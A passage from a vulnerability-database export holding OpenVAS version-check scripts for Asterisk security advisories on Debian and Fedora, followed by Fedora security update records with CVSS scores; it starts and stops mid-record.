nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"asterisk on Debian Linux\";\ntag_insight = \"Asterisk is an Open Source PBX and telephony toolkit. It is, in a\nsense, middleware between Internet and telephony channels on the bottom,\nand Internet and telephony applications at the top.\";\ntag_solution = \"For the oldstable distribution (squeeze), this problem has been fixed in\nversion 1:1.6.2.9-2+squeeze12.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1:1.8.13.1~dfsg1-3+deb7u3.\n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 1:11.7.0~dfsg-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:11.7.0~dfsg-1.\n\nWe recommend that you upgrade your asterisk packages.\";\ntag_summary = \"Jan Juergens discovered a buffer overflow in the parser for SMS messages\nin Asterisk.\n\nAn additional change was backported, which is fully described in\nhttp://downloads.asterisk.org/pub/security/AST-2013-007.htmlWith the fix for AST-2013-007, a new configuration option was added in\norder to allow the system adminitrator to disable the expansion of\ndangerous \nfunctions (such as SHELL()) from any interface which is not\nthe dialplan. In stable and oldstable this option is disabled by default.\nTo enable it add the following line to the section '[options]' in\n/etc/asterisk/asterisk.conf (and restart asterisk)\n\nlive_dangerously = no\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702835);\n script_version(\"$Revision: 6724 $\");\n script_cve_id(\"CVE-2013-7100\");\n script_name(\"Debian Security Advisory DSA 2835-1 (asterisk - buffer overflow)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-14 11:57:17 +0200 (Fri, 14 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-01-05 00:00:00 +0100 (Sun, 05 Jan 2014)\");\n script_tag(name: \"cvss_base\", value:\"5.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2835.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-h323\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-sounds-main\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dahdi\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mobile\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-modules\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mp3\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mysql\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-ooh323\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail-imapstorage\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail-odbcstorage\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dahdi\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mobile\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-modules\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mp3\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mysql\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-ooh323\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail-imapstorage\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail-odbcstorage\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dahdi\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mobile\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-modules\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mp3\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mysql\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-ooh323\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail-imapstorage\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail-odbcstorage\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dahdi\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mobile\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-modules\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mp3\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mysql\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-ooh323\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail-imapstorage\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail-odbcstorage\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:18", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-04-08T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-4566", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2685"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310865535", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865535", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-4566\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.865535\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-04-08 10:33:14 +0530 (Mon, 08 Apr 2013)\");\n script_cve_id(\"CVE-2013-2685\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-4566\");\n script_xref(name:\"FEDORA\", value:\"2013-4566\");\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101614.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n script_tag(name:\"affected\", value:\"asterisk on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.2.2~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-23T13:10:08", "description": "Check for the Version of asterisk", "cvss3": {}, "published": "2013-04-08T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-4566", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2685"], "modified": "2018-01-23T00:00:00", "id": "OPENVAS:865535", "href": "http://plugins.openvas.org/nasl.php?oid=865535", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-4566\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"asterisk on Fedora 18\";\ntag_insight = \"Asterisk is a complete PBX in software. It runs on Linux and provides\n all of the features you would expect from a PBX and more. Asterisk\n does voice over IP in three protocols, and can interoperate with\n almost all standards-based telephony equipment using relatively\n inexpensive hardware.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(865535);\n script_version(\"$Revision: 8494 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 07:57:55 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-04-08 10:33:14 +0530 (Mon, 08 Apr 2013)\");\n script_cve_id(\"CVE-2013-2685\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-4566\");\n\n script_xref(name: \"FEDORA\", value: \"2013-4566\");\n script_xref(name: \"URL\" , value: \"http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101614.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.2.2~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. ", "cvss3": {}, "published": "2013-09-14T02:35:21", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: asterisk-11.5.1-2.fc18", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2013-09-14T02:35:21", "id": "FEDORA:ADB8421654", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/2RZ5C3AZZZJ4AS7OIR6XAFFWDQJASRDJ/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. ", "cvss3": {}, "published": "2013-09-14T02:37:45", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: asterisk-11.5.1-2.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2013-09-14T02:37:45", "id": "FEDORA:6763920EE9", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/B34ZJSP7C7DUTOFWVJXXOADTS75M6XN4/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. ", "cvss3": {}, "published": "2013-01-30T00:55:24", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: asterisk-1.8.20.0-1.fc16", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2013-01-30T00:55:24", "id": "FEDORA:A1E1F217E8", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/6KORRUEWBW6LIMHZK57YJUOTHNNJVQ63/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. ", "cvss3": {}, "published": "2013-01-30T00:36:44", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: asterisk-10.12.0-1.fc17", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2013-01-30T00:36:44", "id": "FEDORA:3F08C21512", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/IE3NNSWZPPLU7VGPTBXX423EHLKWCNQQ/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. ", "cvss3": {}, "published": "2013-01-30T00:33:07", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: asterisk-11.2.0-1.fc18", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2013-01-30T00:33:07", "id": "FEDORA:3C5CC215B2", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/PLNQEC2NQSAUC3H2G37RXU7W7UR2HEJ3/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. ", "cvss3": {}, "published": "2013-04-07T00:44:42", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: asterisk-10.12.2-1.fc17", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2264", "CVE-2013-2686"], "modified": "2013-04-07T00:44:42", "id": "FEDORA:6D7AD209F1", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3U55MPXOBJMG3ODKN2ZYSIKCMFOLQKXJ/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:52", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. ", "cvss3": {}, "published": "2014-01-08T07:59:22", "type": "fedora", 